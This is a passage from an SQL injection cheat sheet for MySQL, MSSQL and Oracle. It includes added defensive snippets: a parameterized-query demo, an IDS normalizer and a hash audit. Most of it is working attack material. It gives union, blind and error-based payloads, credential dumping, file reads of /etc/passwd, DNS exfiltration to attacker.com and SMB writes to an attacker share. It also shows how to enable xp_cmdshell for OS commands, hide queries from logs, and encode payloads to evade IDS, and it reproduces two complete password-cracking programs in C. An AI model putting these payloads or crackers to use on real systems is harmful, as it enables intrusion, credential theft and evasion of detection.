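    db.execute("INSERT INTO Users VALUES ('Mike', 's3cret-constructed')")
    return db

def login_concat(db, username, password):
    """Vulnerable: input is pasted into the SQL text, so a quote in it becomes syntax."""
    sql = ("SELECT username FROM Users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone() is not None

def login_param(db, username, password):
    """Hardened: placeholders keep input as data; the statement text never changes."""
    sql = "SELECT username FROM Users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def outcome(login, db, password):
    """Classify one attempt the way the True/False tests in this section do."""
    try:
        ok = login(db, "Mike", password)
    except sqlite3.OperationalError:
        return "sql-error"        # an unbalanced quote broke the statement
    return "logged-in" if ok else "rejected"

# Inputs taken from this section: the two quote tests and two login strings.
PAYLOADS = ["'", "''", "' OR '' = '", "' OR 1 -- -"]

def compare():
    """Map each input to (concatenated result, parameterized result)."""
    db = make_db()
    return {p: (outcome(login_concat, db, p), outcome(login_param, db, p))
            for p in PAYLOADS}

if __name__ == "__main__":
    for payload, (weak, safe) in compare().items():
        print("%-14r concat=%-10s param=%s" % (payload, weak, safe))
```

A single quote producing an error while a doubled quote does not is the signal to look for in application error logs; with placeholders every one of these inputs is just a wrong password.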
Testing Version
- VERSION();
- @@VERSION;
Example: ' AND MID(VERSION(),1,1) = '5 - True if MySQL version is 5
MySQL-specific code
MySQL allows you to specify the version number after the exclamation mark. The syntax within the comment is only executed if the version is greater or equal to the specified version number.
Example: UNION SELECT /*!50000 5,null;%00x%A0*//*!40000 4,null-- ,*//*!30000 3,null-- x*/,null-- - (UNION with 2 columns)
Note:
- You can use comments in between the name and the parenthesis
- Example: VERSION/**/()
- Output will contain -nt-log in case the DBMS runs on a Windows based machine
Retrieving DB usernames/passwords
- Database.Table: mysql.user (Privileged)
- Columns: user, password
- Current User: user(), system_user()
Example:
- UNION SELECT CONCAT(user, 0x3A, password) FROM mysql.user WHERE user = 'root'
Tables & Columns
Finding out column #
- Order By:
- ORDER BY 1
- ORDER BY 2
- ORDER BY ...
Note: Keep incrementing the number until you get a False response.
Example:
- 1' ORDER BY 1-- - True
- 1' ORDER BY 2-- - True
- 1' ORDER BY 3-- - True
- 1' ORDER BY 4-- - False (Only 3 Columns)
- -1' UNION SELECT 1,2,3-- -
- Error Based:
- AND (SELECT * FROM SOME_TABLE) = 1
- Operand should contain 3 column(s)
Note: This works if you know the table name you're after and error showing is enabled
Retrieving Tables
- Union:
- UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;
Blind:
- AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'
Error:
- AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))
- (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0);
Note:
- version=9 for MySQL 4
- version=10 for MySQL 5
Retrieving Columns
- Union:
- UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
Blind:
- AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
Error:
- AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))
- (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0);
- AND (1,2,3) = (SELECT * FROM SOME_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1
Procedure Analyse():
- Refer to PROCEDURE ANALYSE() below.
Note:
The GROUP_CONCAT() function allows grouping of the tables/columns, instead of viewing them one at a time.
Note:
- Output is limited to 1024 chars by default.
- All default database table names: ~900 chars
- All default database column names: ~6000 chars
PROCEDURE ANALYSE()
- 1 PROCEDURE ANALYSE() #get first column name
- 1 LIMIT 1,1 PROCEDURE ANALYSE() #get second column name
- 1 LIMIT 2,1 PROCEDURE ANALYSE() #get third column name
Note:
The web app must display the first selected column of the SQL query you are injecting into.
Retrieving Multiple Tables/Columns at once
- UNION SELECT MID(GROUP_CONCAT('<br>','Table: ',table_name,'<br>','Column: ',column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR '<br>'),1,1024) FROM information_schema.columns
Find Tables from Column Name
- SELECT table_name FROM information_schema.columns WHERE column_name = 'username'; - Finds the table names for any columns named username.
- SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%'; - Finds the table names for any columns that contain the word user.
Find Column From Table Name
- SELECT column_name FROM information_schema.columns WHERE table_name = 'Users';
- SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%user%';
Avoiding the use of single/double quotations
- UNION SELECT CONCAT(username,0x3a,password) FROM Users WHERE username = 0x61646D696E
- UNION SELECT CONCAT(username,0x3a,password) FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
String concatenation
- SELECT concat('a','a','a')
- SELECT 'a' 'd' 'mi' 'n'
- SELECT/*/'a'/*/ 'd'/*/ 'mi'/*/ 'n' (phpMyAdmin)
Privileges
FILE privilege
MySQL 4/5
- ' UNION SELECT file_priv,null FROM mysql.user WHERE user = 'username
- ' AND MID((SELECT file_priv FROM mysql.user WHERE user = 'username'),1,1) = 'Y
MySQL 5
- ' UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%
- ' AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'),1,1)='Y
Out Of Band Channeling
Timing
- BENCHMARK()
- SLEEP() (MySQL 5)
- IF(), (CASE()WHEN)
- ' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('test')), false)) - '
DNS (requires FILE privilege)
- SELECT LOAD_FILE(concat('\\\\foo.',(select MID(version(),1,1)),'.attacker.com\\'));
SMB (requires FILE privilege)
- ' OR 1=1 INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt
Reading Files (requires FILE privilege)
- LOAD_FILE()
- UNION SELECT LOAD_FILE('/etc/passwd')-- -
- UNION SELECT LOAD_FILE(0x2F6574632F706173737764)-- -
Note:
- File must be located on the server host
- The basedirectory for load_file() is the @@datadir
- The file must be readable by the MySQL user
- The file size must be less than max_allowed_packet
- UNION SELECT @@max_allowed_packet (default value is 1047552 Byte)
Writing Files (requires FILE privilege)
- INTO OUTFILE/DUMPFILE
- UNION SELECT 'code', null INTO OUTFILE '/tmp/file
Note:
- You can’t overwrite files with INTO OUTFILE
- INTO OUTFILE must be the last statement in the query
- There is no way to encode the pathname, so quotes are required
Stacked Queries with PDO
Stacked queries are possible when PHP uses the PDO_MYSQL driver to make a connection to the database.
Example:
- AND 1=0; INSERT INTO Users(username,password,priv) VALUES ('BobbyTables', 'kl20da$$','admin');
User Defined Functions
Fuzzing and Obfuscation
Note: URL encoding your injection can sometimes be useful for IDS evasion.
- %75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31
- SELECT %74able_%6eame FROM information_schema.tables;
Furthermore, by using # followed by a newline, we can split the query into separate lines, sometimes tricking the IDS.
1'#AND 0#UNION#SELECT@tmp:=table_name x FROM#`information_schema`.tables LIMIT 1#
URL Encoded: 1'%23%0AAND 0%23%0AUNION%23%0ASELECT@tmp:=table_name x FROM%23%0A`information_schema`.tables LIMIT 1%23
Allowed Intermediary Characters after AND/OR
- 2B
- 2D
- 7E
Example: SELECT 1 FROM table WHERE 1=1 AND-+-+-+-+~~((1))
$prefixes = array(" ", "+", "-", "~", "!", "@", " ");
- 09
- 0A
- 0B
- 0D
- 0C
- 20
- A0
Example: SELECT 1 FROM information_schema%20%0C%20.%20%09tables;
Operators
$operators = array("^", "=", "!=", "%", "/", "*", "&", "&&", "|", "||", "<", ">", ">>", "<<", ">=", "<=", "<>", "<=>", "AND", "OR", "XOR", "DIV", "LIKE", "RLIKE", "SOUNDS LIKE", "REGEXP", "IS", "NOT");
Constants
- current_user
- null, \N
- true, false
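The URL-encoding, #-newline and inline-comment notes above describe inputs that slip past a signature applied to the raw request. The following added example (not part of the original reference) shows the detection side: decode and normalize first, then match. The three rules and all function names are constructed for illustration and are not taken from any real IDS ruleset; the sample strings in the usage section are the ones printed on this page.

```python
import re
from urllib.parse import unquote

# Constructed, deliberately simple signatures (lower-case; input is lowered first).
RULES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema-enum": re.compile(r"\bfrom\s+`?information_schema\b"),
    "version-probe": re.compile(r"\bversion\s*\("),
}

def decode(raw, max_rounds=3):
    """Undo percent-encoding, repeating a bounded number of times for nested encoding."""
    s = raw
    for _ in range(max_rounds):
        nxt = unquote(s, encoding="latin-1")   # latin-1 so %A0 becomes byte A0
        if nxt == s:
            break
        s = nxt
    return s

def squash(s):
    """Collapse the whitespace bytes the page lists (09 0A 0B 0C 0D 20 A0)."""
    return re.sub(r"[\t\n\x0b\x0c\r \xa0]+", " ", s).strip().lower()

def strip_comments(s):
    """Remove what the MySQL parser ignores; keep what it executes."""
    s = re.sub(r"/\*!\d*", " ", s)                 # /*!50000 ... */ body is executed
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)   # plain /* ... */ is ignored
    s = s.replace("*/", " ")                       # closers left by versioned comments
    s = re.sub(r"#[^\n]*(?:\n|$)", " ", s)         # '#' comment runs to end of line
    return s

def hits(text):
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def inspect(raw):
    """Return (rules matching the raw bytes, rules matching after normalization)."""
    decoded = decode(raw)
    # Match both views: stripping '#' could hide text that sits inside a string literal.
    views = {squash(decoded), squash(strip_comments(decoded))}
    normalized = sorted({h for v in views for h in hits(v)})
    return hits(raw.lower()), normalized

if __name__ == "__main__":
    samples = [                                    # strings quoted from this page
        "%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31",
        "1'%23%0AAND 0%23%0AUNION%23%0ASELECT@tmp:=table_name x "
        "FROM%23%0A`information_schema`.tables LIMIT 1%23",
        "VERSION/**/()",
    ]
    for s in samples:
        print(inspect(s), s[:40])
```

Logging both lists per request is useful in practice: a rule that fires only after normalization marks a request that was shaped to avoid the raw signature.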
MySQL Functions()
MySQL Password Hashing (Taken from MySQL website)
Prior to MySQL 4.1, password hashes computed by the PASSWORD() function are 16 bytes long. Such hashes look like this:
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+
As of MySQL 4.1, the PASSWORD() function has been modified to produce a longer 41-byte hash value:
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+
MySQL Password() Cracker
Cain & Abel, JTR are capable of cracking MySQL 3.x-6.x passwords.
MySQL < 4.1 Password Cracker
"This tool is a high-speed brute-force password cracker for MySQL hashed passwords. It can break an 8-character password containing any printable ASCII characters in a matter of hours on an ordinary PC."
/* This program is public domain. Share and enjoy.
 *
 * Example:
 * $ gcc -O2 -fomit-frame-pointer MySQLfast.c -o MySQLfast
 * $ MySQLfast 6294b50f67eda209
 * Hash: 6294b50f67eda209
 * Trying length 3
 * Trying length 4
 * Found pass: barf
 *
 * The MySQL password hash function could be strengthened considerably
 * by:
 * - making two passes over the password
 * - using a bitwise rotate instead of a left shift
 * - causing more arithmetic overflows
 */
#include <stdio.h>

typedef unsigned long u32;

/* Allowable characters in password; 33-126 is printable ascii */
#define MIN_CHAR 33
#define MAX_CHAR 126

/* Maximum length of password */
#define MAX_LEN 12

#define MASK 0x7fffffffL

int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
{
    int i, c;
    u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
    u32 newstate1, newstate2, newstate3;
    u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
    u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];

    i = -1;
    sum = 7;
    state1_ary[0] = 1345345333L;
    state2_ary[0] = 0x12345671L;

    while (1) {
        while (i < stop) {
            i++;
            pass_ary[i] = MIN_CHAR;
            step_ary[i] = (state1_ary[i] & 0x3f) + sum;
            xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
            sum += MIN_CHAR;
            state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
            state2_ary[i+1] = state2_ary[i]
                + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
        }

        state1 = state1_ary[i+1];
        state2 = state2_ary[i+1];
        step = (state1 & 0x3f) + sum;
        xor1 = step*MIN_CHAR + (state1 << 8);
        xor2 = (state2 << 8) ^ state1;

        for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
            newstate2 = state2 + (xor1 ^ xor2);
            newstate1 = state1 ^ xor1;

            newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
            div = (newstate1 & 0x3f) + sum + c;
            diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
            if (diff % div != 0) continue;
            d = diff / div;
            if (d < MIN_CHAR || d > MAX_CHAR) continue;

            div = (newstate3 & 0x3f) + sum + c + d;
            diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
            if (diff % div != 0) continue;
            e = diff / div;
            if (e < MIN_CHAR || e > MAX_CHAR) continue;

            pass_ary[i+1] = c;
            pass_ary[i+2] = d;
            pass_ary[i+3] = e;
            return 1;
        }

        while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
            sum -= MAX_CHAR;
            i--;
        }
        if (i < 0) break;
        pass_ary[i]++;
        xor_ary[i] += step_ary[i];
        sum++;
        state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
        state2_ary[i+1] = state2_ary[i]
            + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
    }

    return 0;
}

void crack(char *hash)
{
    int i, len;
    u32 targ1, targ2, targ3;
    int pass[MAX_LEN];

    if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {
        printf("Invalid password hash: %s\n", hash);
        return;
    }
    printf("Hash: %08lx%08lx\n", targ1, targ2);
    targ3 = targ2 - targ1;
    targ3 = targ2 - ((targ3 << 8) ^ targ1);
    targ3 = targ2 - ((targ3 << 8) ^ targ1);
    targ3 = targ2 - ((targ3 << 8) ^ targ1);

    for (len = 3; len <= MAX_LEN; len++) {
        printf("Trying length %d\n", len);
        if ( crack0(len-4, targ1, targ3, pass) ) {
            printf("Found pass: ");
            for (i = 0; i < len; i++)
                putchar(pass[i]);
            putchar('\n');
            break;
        }
    }
    if (len > MAX_LEN)
        printf("Pass not found\n");
}

int main(int argc, char *argv[])
{
    int i;
    if (argc <= 1)
        printf("usage: %s hash\n", argv[0]);
    for (i = 1; i < argc; i++)
        crack(argv[i]);
    return 0;
}
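For the two hash formats shown under MySQL Password Hashing above, an audit sketch that is an added example and not part of the original reference. It classifies entries from a mysql.user export, flags accounts still on the 16-hex pre-4.1 format, and uses the fact that the 4.1 format is an unsalted double SHA-1 to spot accounts sharing a password. The account names and the function names are constructed; the two hash values are the PASSWORD('mypass') outputs printed on this page.

```python
import hashlib
import re
from collections import defaultdict

PRE41 = re.compile(r"^[0-9a-fA-F]{16}$")       # 16 hex chars, pre-4.1 format
V41 = re.compile(r"^\*[0-9a-fA-F]{40}$")       # '*' + 40 hex chars, 4.1+ format

def mysql41_password(password):
    """4.1+ PASSWORD(): '*' followed by upper-case hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def classify(stored):
    if stored == "":
        return "empty"
    if PRE41.match(stored):
        return "pre-4.1"
    if V41.match(stored):
        return "4.1"
    return "unknown"

def audit(rows):
    """rows: (user, host, password-hash) tuples as exported from mysql.user."""
    findings = []
    by_hash = defaultdict(list)
    for user, host, stored in rows:
        account = "%s@%s" % (user or "(anonymous)", host)
        kind = classify(stored)
        if kind == "pre-4.1":
            findings.append((account, "legacy-hash"))      # reset under 4.1+ hashing
        elif kind == "empty":
            findings.append((account, "no-password"))
        elif kind == "unknown":
            findings.append((account, "unknown-format"))
        if kind in ("pre-4.1", "4.1"):
            by_hash[stored.upper()].append(account)
    # Neither format is salted, so equal hashes mean equal passwords.
    for accounts in by_hash.values():
        if len(accounts) > 1:
            findings.append((", ".join(accounts), "shared-hash"))
    return findings

# Constructed accounts; hash values are the two 'mypass' examples from the page.
SAMPLE_ROWS = [
    ("root", "localhost", "*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4"),
    ("backup", "localhost", "*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4"),
    ("app", "%", "6f8c114b58f2ce9e"),
    ("", "localhost", ""),
]

if __name__ == "__main__":
    for who, issue in audit(SAMPLE_ROWS):
        print("%-14s %s" % (issue, who))
```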
MSSQL
Default Databases
- pubs
- model
- msdb
- tempdb
- northwind
- information_schema (>= 2000)
Comment Out Query
- /*
- --
- %00
Testing Version
- @@VERSION
- VERSION()
Retrieving user names/passwords
- Database.Table:
- master..syslogins, master..sysprocesses
Columns:
- name, loginame
Current User: user, system_user, suser_sname(), is_srvrolemember('sysadmin')
Database Credentials:
- SELECT user, password FROM master.dbo.sysxlogins
Example:
- SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID; -- Returns current user
- SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);-- Is Admin?
Database Server Hostname
- @@servername
- SERVERPROPERTY()
Example:
SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition') --
Only available >= SQL Server 2005
Listing Databases
- Table: master..sysdatabases
- Column: name
- Function: DB_NAME(i)
Example:
- SELECT name FROM master..sysdatabases;
- SELECT DB_NAME(5);
We can retrieve the tables/columns from two different databases: information_schema.tables and information_schema.columns, or master..sysobjects and master..syscolumns.
Tables & Columns
Retrieving Tables
- Union:
- UNION SELECT name FROM master..sysobjects WHERE xtype='U' --
Blind:
- AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
Error Based:
- AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables)
- AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))
Note:
Xtype = 'U' is for User-defined tables. You can use 'V' for views.
Retrieving Columns
- Union:
- UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename')
Blind:
- AND SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns > 'A'
Error Based:
- AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns)
- AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))
Retrieving Multiple Tables/Columns at once
The following 3 queries will create a temporary table/column and insert all the user-defined tables into it, it will then dump the table content and finish by deleting the table.
- Create Temp Table/Column and Insert Data:
- AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
Dump Content:
- AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB);
Delete Table:
- AND 1=0; DROP TABLE TMP_DB;
Note:
You can encode your query in hex to "obfuscate" your attack.
' and 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--sp_password
OPENROWSET Attacks
SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'p4ssw0rd', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"')
System Command Execution
MSSQL includes an extended stored procedure named xp_cmdshell that can be used to execute operating system commands.
EXEC master.dbo.xp_cmdshell 'cmd'
Prior to MSSQL 2005, xp_cmdshell is disabled by default, but can easily be activated with the following queries:
EXEC sp_configure 'show advanced options', 1
EXEC sp_configure reconfigure
EXEC sp_configure 'xp_cmdshell', 1
EXEC sp_configure reconfigure
Alternatively, you can create your own procedure to achieve the same results:
DECLARE @execmd INT
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'
If the SQL version is higher than 2000, you will have to run additional queries in order to execute the previous command.
EXEC sp_configure 'show advanced options', 1
EXEC sp_configure reconfigure
EXEC sp_configure 'OLE Automation Procedures', 1
EXEC sp_configure reconfigure
Example:
- ' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
- ' UNION SELECT tbl FROM TMP_DB--
- ' DROP TABLE TMP_DB--
This example checks to see if xp_cmdshell is loaded; if it is, it checks if it is active and then proceeds to run the 'dir' command and inserts the results into TMP_DB.
SP_PASSWORD (Hiding Query)
Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure.
Example: ' and 1=1--sp_password
-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
Stacked Queries
- ' AND 1=0 INSERT INTO ([column1], [column2]) VALUES ('value1', 'value2')
Fuzzing and Obfuscation
Encodings
Hex
- ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--sp_password
URL Encoded
- %53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%64%75%61%6c
Unicode
- %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0031%u0020%u0046%u0052%u004f%u004d%u0020%u0064%u0075%u0061%u006c
HTML Entities
- AND 1=1 (&# has to be URL Encoded)
- %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B
Allowed Intermediary Characters:
- 01-1F
- 25
Example: S%E%L%E%C%T%01column%02FROM%03table%00
Note: The percentage signs in between SELECT are only possible on ASP
- 28
- 29
Example: UNION(SELECT(column)FROM(table))
- 5B
- 5D
- 22
Example: SELECT"table_name"FROM[information_schema].[tables]
Allowed Intermediary Characters after AND/OR
- 01-1F
- 2B
- 2D
- 2E
- 5C
- 7E
Example: SELECT 1FROM[table]WHERE\1=\1AND\1=\1
MSSQL Password Hashing
Passwords begin with 0x0100, the first four bytes following the 0x are a constant; the next eight bytes are the hash salt and the remaining 80 bytes are two hashes, the first 40 bytes are a case-sensitive hash of the password, while the second 40 bytes are the uppercased version.
Example:
0x0100236A261CE12AB57BA22A7F44CE3B780E52098378B65852892EEE9 ...
1C0784B911D76BF4EB124550ACABDFD1457
MSSQL Password Cracker
/////////////////////////////////////////////////////////////////////////////////
//
// SQLCrackCl
//
// This will perform a dictionary attack against the
// upper-cased hash for a password. Once this
// has been discovered try all case variant to work
// out the case sensitive password.
//
// This code was written by David Litchfield to
// demonstrate how Microsoft SQL Server 2000
// passwords can be attacked. This can be
// optimized considerably by not using the CryptoAPI.
//
// (Compile with VC++ and link with advapi32.lib
// Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>

FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;

int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);

int main(int argc, char *argv[])
{
    int err = 0;
    if(argc !=3)
    {
        printf("\n\n*** SQLCrack *** \n\n");
        printf("C:\\>%s hash passwd-file\n\n",argv[0]);
        printf("David Litchfield (david@ngssoftware.com)\n");
        printf("24th June 2002\n");
        return 0;
    }
    err = OpenPasswordFile(argv[2]);
    if(err !=0)
    {
        return printf("\nThere was an error opening the password file %s\n",argv[2]);
    }
    err = CrackPassword(argv[1]);
    fclose(fd);
    printf("\n\n%d",wd);
    return 0;
}

int OpenPasswordFile(char *pwdfile)
{
    fd = fopen(pwdfile,"r");
    if(fd)
        return 0;
    else
        return 1;
}

int CrackPassword(char *hash)
{
    char phash[100]="";
    char pheader[8]="";
    char pkey[12]="";
    char pnorm[44]="";
    char pucase[44]="";
    char pucfirst[8]="";
    char wttf[44]="";
    char uwttf[100]="";
    char *wp=NULL;
    char *ptr=NULL;
    int cnt = 0;
    int count = 0;
    unsigned int key=0;
    unsigned int t=0;
    unsigned int address = 0;
    unsigned char cmp=0;
    unsigned char x=0;
    HCRYPTPROV hProv=0;
    HCRYPTHASH hHash;
    DWORD hl=100;
    unsigned char szhash[100]="";
    int len=0;

    if(strlen(hash) !=94)
    {
        return printf("\nThe password hash is too short!\n");
    }
    if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X'))
    {
        hash = hash + 2;
        strncpy(pheader,hash,4);
        printf("\nHeader\t\t: %s",pheader);
        if(strlen(pheader)!=4)
            return printf("%s",lerr);
        hash = hash + 4;
        strncpy(pkey,hash,8);
        printf("\nRand key\t: %s",pkey);
        if(strlen(pkey)!=8)
            return printf("%s",lerr);
        hash = hash + 8;
        strncpy(pnorm,hash,40);
        printf("\nNormal\t\t: %s",pnorm);
        if(strlen(pnorm)!=40)
            return printf("%s",lerr);
        hash = hash + 40;
        strncpy(pucase,hash,40);
        printf("\nUpper Case\t: %s",pucase);
        if(strlen(pucase)!=40)
            return printf("%s",lerr);
        strncpy(pucfirst,pucase,2);
        sscanf(pucfirst,"%x",&cmp);
    }
    else
    {
        return printf("The password hash has an invalid format!\n");
    }
    printf("\n\n Trying...\n");
    if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))
    {
        if(GetLastError()==NTE_BAD_KEYSET)
        {
            // KeySet does not exist. So create a new keyset
            if(!CryptAcquireContext(&hProv,NULL,NULL,PROV_RSA_FULL,CRYPT_NEWKEYSET ))
            {
                printf("FAILLLLLLL!!!");
                return FALSE;
            }
        }
    }
    while(1)
    {
        // get a word to try from the file
        ZeroMemory(wttf,44);
        if(!fgets(wttf,40,fd))
            return printf("\nEnd of password file. Didn't find the password.\n");
        wd++;
        len = strlen(wttf);
        wttf[len-1]=0x00;
        ZeroMemory(uwttf,84);
        // Convert the word to UNICODE
        while(count < len)
        {
            uwttf[cnt]=wttf[count];
            cnt++;
            uwttf[cnt]=0x00;
            count++;
            cnt++;
        }
        len --;
        wp = &uwttf;
        sscanf(pkey,"%x",&key);
        cnt = cnt - 2;
        // Append the random stuff to the end of
        // the uppercase unicode password
        t = key >> 24;
        x = (unsigned char) t;
        uwttf[cnt]=x;
        cnt++;
        t = key << 8;
        t = t >> 24;
        x = (unsigned char) t;
        uwttf[cnt]=x;
        cnt++;
        t = key << 16;
        t = t >> 24;
        x = (unsigned char) t;
        uwttf[cnt]=x;
        cnt++;
        t = key << 24;
        t = t >> 24;
        x = (unsigned char) t;
        uwttf[cnt]=x;
        cnt++;
        // Create the hash
        if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
        {
            printf("Error %x during CryptCreatHash!\n", GetLastError());
            return 0;
        }
        if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
        {
            printf("Error %x during CryptHashData!\n", GetLastError());
            return FALSE;
        }
        CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
        // Test the first byte only. Much quicker.
        if(szhash[0] == cmp)
        {
            // If first byte matches try the rest
            ptr = pucase;
            cnt = 1;
            while(cnt < 20)
            {
                ptr = ptr + 2;
                strncpy(pucfirst,ptr,2);
                sscanf(pucfirst,"%x",&cmp);
                if(szhash[cnt]==cmp)
                    cnt ++;
                else
                {
                    break;
                }
            }
            if(cnt == 20)
            {
                // We've found the password
                printf("\nA MATCH!!! Password is %s\n",wttf);
                return 0;
            }
        }
        count = 0;
        cnt=0;
    }
    return 0;
}
ORACLE
Default Databases
- SYSTEM
- SYSAUX
Comment Out Query
- --
Testing Version
- SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'
- SELECT banner FROM v$version WHERE banner LIKE 'TNS%'
- SELECT version FROM v$instance
Retrieving Users/Passwords
- SELECT username FROM all_users
- SELECT name, password from sys.user$ (Privileges required, <= 10g)
- SELECT name, spare4 from sys.user$ (Privileges required, 11g)
Retrieving Databases
Current Database
- SELECT name FROM v$database;
- SELECT instance_name FROM v$instance
- SELECT global_name FROM global_name
- SELECT SYS.DATABASE_NAME FROM DUAL
User Databases
Tables & Columns
Retrieving Tables
- SELECT table_name FROM all_tables
Retrieving Columns
- SELECT column_name FROM all_tab_columns
Finding Tables from Column Name
- SELECT column_name FROM all_tab_columns WHERE table_name = 'Users'
Finding Column From Table Name
- SELECT table_name FROM all_tab_tables WHERE column_name = 'password'
Fuzzing and Obfuscation
Avoiding the use of single/double quotations
Unlike other RDBMS, Oracle allows us to reference table/column names encoded.
- SELECT chr(32)||chr(92)||chr(93) FROM dual
